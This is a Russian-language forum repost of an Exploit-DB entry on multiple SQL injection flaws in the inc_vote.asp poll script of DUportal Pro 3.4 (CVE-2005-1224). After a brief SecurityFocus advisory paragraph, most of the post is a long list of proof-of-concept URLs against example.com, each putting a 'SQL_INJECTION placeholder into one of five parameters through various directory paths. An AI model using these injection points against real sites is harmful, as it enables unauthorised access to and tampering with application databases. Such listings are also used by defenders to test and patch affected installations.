Exploit DUportal Pro 3.4 - 'inc_vote.asp' Multiple SQL Injections

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25478
Проверка EDB
  1. Пройдено
Автор
DCRAB
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2005-1224
Дата публикации
2005-04-20
Код:
source: https://www.securityfocus.com/bid/13285/info
  
DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
  
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
  
These vulnerabilities are reported to affect DUportal Pro 3.4; earlier versions may also be affected. 

http://www.example.com/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Classifieds/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Events/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/events/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Files/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/home/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
 
Источник
www.exploit-db.com

Похожие темы